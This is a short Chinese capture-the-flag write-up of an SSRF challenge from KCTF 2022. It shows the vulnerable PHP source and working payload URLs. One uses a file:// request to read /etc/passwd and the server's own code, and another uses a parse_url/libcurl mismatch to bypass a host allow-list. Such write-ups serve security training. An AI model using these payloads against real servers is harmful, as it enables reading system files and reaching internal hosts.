-
-
[原创]KCTF2022 Q1 第四题 飞蛾扑火
-
发表于: 2022-5-16 22:41
-
考点:ssrf & url bypass
看到phpinfo.php和url.php
想到ssrf
file协议:http://121.36.145.157:8044/url.php?url=file://127.0.0.1/etc/passwd
能读取到passwd
读取下url.php
主干
需要绕过parse_url和libcurl
构造url:http://121.36.145.157:8044/url.php?url=123.57.254.42://ctf.pediy.com/../flag.php
得到flag:flag{xxx_999()xx*@eeEEE}
<html><head><meta charset="utf-8">
<title>欢迎挑战 Design by 香草</title>
</head>
<body><!--phpinfo.php-->
<img src="url.php?url=https://ctf.pediy.com/upload/team/762/team236762.png">
</body>
</html>
<html><head><meta charset="utf-8">
<title>欢迎挑战 Design by 香草</title>
</head>
<body><!--phpinfo.php-->
<img src="url.php?url=https://ctf.pediy.com/upload/team/762/team236762.png">
</body>
</html>
curl http://121.36.145.157:8044/url.php?url=file://127.0.0.1/var/www/html/url.php
curl http://121.36.145.157:8044/url.php?url=file://127.0.0.1/var/www/html/url.php
$url=$_GET["url"];
$uu=parse_url($url);
$host=isset($uu["host"])?$uu["host"]:"";
$scheme=isset($uu["scheme"])?$uu["scheme"]:"";
if(empty($host)){
die("host is null");
}if(empty($scheme)){
die("scheme is null");
}//https://ctf.pediy.com/upload/team/762/team236762.png?
if($host=="ctf.pediy.com"||$host=="127.0.0.1"||$host=="localhost"){
//echo curl_request("http://123.57.254.42/flag.php","get",[],true,5);//get flag
echo curl_request($url,'',"get",[],true,5);
}else{
die("host not allow");
}[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
|
|
|---|---|
